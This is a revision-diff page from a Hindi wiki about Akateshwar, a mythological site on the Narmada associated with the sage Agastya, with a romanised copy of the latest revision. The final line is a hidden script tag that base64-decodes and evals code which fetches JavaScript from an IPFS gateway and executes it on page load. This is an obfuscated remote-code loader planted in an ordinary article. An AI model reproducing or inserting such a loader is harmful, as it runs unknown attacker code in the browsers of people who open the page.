Difference between revisions of "अकतेश्वर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*नर्मदा के उत्तर तट पर अवस्थित है। *कहा जाता है कि य...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
*[[नर्मदा]] के उत्तर तट पर अवस्थित है।  
+
'''अकतेश्वर''' [[नर्मदा नदी]] के उत्तर तट पर स्थित एक पौराणिक स्थान है।  
*कहा जाता है कि यह वही स्थान है जहां दक्षिण दिशा की ओर जाते हुए महर्षि [[अगस्त्य]] ने, [[विंध्याचल]] को बढ़ने से रोक दिया था।  
+
*कहा जाता है कि यह वही स्थान है जहां दक्षिण दिशा की ओर जाते हुए महर्षि [[अगस्त्य]] ने [[विंध्याचल]] को बढ़ने से रोक दिया था।  
 
*[[महाभारत]] [[वन पर्व महाभारत|वन पर्व]]<ref>[[महाभारत]] [[वन पर्व महाभारत|वन पर्व]] 104</ref> तथा अनेक [[पुराण|पुराणों]] में इस कथा का उल्लेख है।  
 
*[[महाभारत]] [[वन पर्व महाभारत|वन पर्व]]<ref>[[महाभारत]] [[वन पर्व महाभारत|वन पर्व]] 104</ref> तथा अनेक [[पुराण|पुराणों]] में इस कथा का उल्लेख है।  
 
*महर्षि अगस्त्य के नाम से एक प्राचीन शिवमंदिर भी यहां स्थित है।
 
*महर्षि अगस्त्य के नाम से एक प्राचीन शिवमंदिर भी यहां स्थित है।
  
  
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
 
 
==संबंधित लेख==
 
==संबंधित लेख==
[[Category:ऐतिहासिक_स्थान_कोश]]
+
{{महाभारत}}
[[Category:ऐतिहासिक_स्थल]]
+
[[Category:पौराणिक स्थान]]
[[Category:महाभारत]]  
+
[[Category:ऐतिहासिक स्थल]]
 +
[[Category:महाभारत]] [[Category:पौराणिक कोश]]  
 
[[Category:पुराण]]  
 
[[Category:पुराण]]  
  
 
__INDEX__
 
__INDEX__

Latest revision as of 07:12, 16 October 2016

akateshvar narmada nadi ke uttar tat par sthit ek pauranik sthan hai.

  • kaha jata hai ki yah vahi sthan hai jahaan dakshin disha ki or jate hue maharshi agasty ne viandhyachal ko badhane se rok diya tha.
  • mahabharat van parv[1] tatha anek puranoan mean is katha ka ullekh hai.
  • maharshi agasty ke nam se ek prachin shivamandir bhi yahaan sthit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>